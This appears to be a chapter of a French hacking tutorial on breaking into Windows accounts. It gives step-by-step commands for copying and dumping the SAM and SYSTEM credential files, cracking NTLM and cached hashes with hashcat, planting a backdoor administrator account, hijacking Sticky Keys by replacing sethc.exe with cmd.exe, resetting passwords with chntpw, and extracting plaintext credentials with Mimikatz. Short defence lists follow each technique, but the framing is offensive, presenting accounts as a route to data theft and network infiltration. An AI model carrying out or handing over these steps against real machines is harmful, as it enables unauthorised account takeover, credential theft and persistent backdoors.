Un simple compte utilisateur sous Windows peut devenir une véritable mine d’or. Accéder à ces comptes permet d’aller plus loin : vol de données, escalade de privilèges, infiltration réseau... Dans ce chapitre, tu apprendras à contourner, réinitialiser et forcer les mots de passe Windows, tout en découvrant les meilleures protections. Comprendre les comptes utilisateurs Windows Les comptes sont classés par niveaux d'accès : • Standard : droits limités • Administrateur : contrôle total • Invité : très restreint, souvent désactivé Les mots de passe sont stockés sous forme de hash NTLM dans le fichier SAM :Code:%SystemRoot%\System32\Config\SAM Technique 1 : Cracker un mot de passe Windows But : extraire les hashes et les casser via brute force. 1. Démarrer sur un autre OS (clé USB bootable Linux) 2. Copier les fichiers SAM et SYSTEM :Code:cp /mnt/windows/System32/Config/SAM /chemin/de/sauvegarde cp /mnt/windows/System32/Config/SYSTEM /chemin/de/sauvegarde3. Extraire les hashes :Code:secretsdump.py LOCAL -sam SAM -system SYSTEM4. Casser les mots de passe :Code:hashcat -m 1000 hashes.txt wordlist.txtDéfenses : • Utiliser des mots de passe complexes et longs • Activer le verrouillage de compte après X tentatives • Renouveler régulièrement les mots de passe Technique 2 : Bypasser un mot de passe utilisateur Méthode A : Safe Mode avec Invite de commandes 1. Redémarrer en mode sans échec (touche F8) 2. Créer un compte admin :Code:net user adminbackdoor motdepasse /add net localgroup administrators adminbackdoor /add3. Redémarrer et se connecter Méthode B : Détourner les Sticky Keys 1. Boot depuis une clé USB Linux 2. Remplacer sethc.exe par cmd.exe :Code:copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe3. À l’écran de login, appuyer 5× sur Shift 4. Lancer :Code:net user cible nouveaupassDéfenses : • Activer BitLocker pour bloquer l'accès au disque • Restreindre l'accès physique • Surveiller les fichiers système critiques Astuce 13 : Réinitialiser avec chntpw 1. Démarrer sur une live USB Linux 2. Installer chntpw :Code:sudo apt install chntpw3. Monter la partition Windows :Code:sudo mount /dev/sdX /mnt cd /mnt/Windows/System32/config4. Lancer l’outil :Code:sudo chntpw -u nom_utilisateur SAM5. Réinitialiser ou déverrouiller le compte Défenses : • Chiffrer les disques sensibles • Mettre un mot de passe BIOS/UEFI pour bloquer le boot externe Astuce 14 : Extraire les identifiants mis en cache Windows conserve des credentials pour les connexions hors-ligne. Il est possible de les récupérer en clair. 1. Extraire avec Mimikatz :Code:mimikatz # sekurlsa::logonpasswords2. Rechercher les credentials dans le résultat 3. Casser les hashes récupérés :Code:hashcat -m 2100 hashes.txt wordlist.txtDéfenses : • Limiter le nombre de comptes mis en cache • Utiliser une authentification multifactorielle (MFA) Outils incontournables pour attaquer les comptes Cain & Abel • Récupération de mots de passe • Sniffing réseau • Cracking de hash Mimikatz • Extraction de mots de passe en mémoire • Commandes :Code:mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswordsOphcrack • Cracking par tables arc-en-ciel • Démarrage depuis une image live pour casser les mots de passe Conclusion du chapitre Tu sais désormais : • Contourner ou écraser un mot de passe Windows • Récupérer les credentials en mémoire • Utiliser les bons outils d’analyse et de cracking • Mettre en place les bonnes pratiques pour bloquer ces attaques Prochain arrêt : le Registre Windows ! Exploits, tweaks, autoruns... Tout y passe.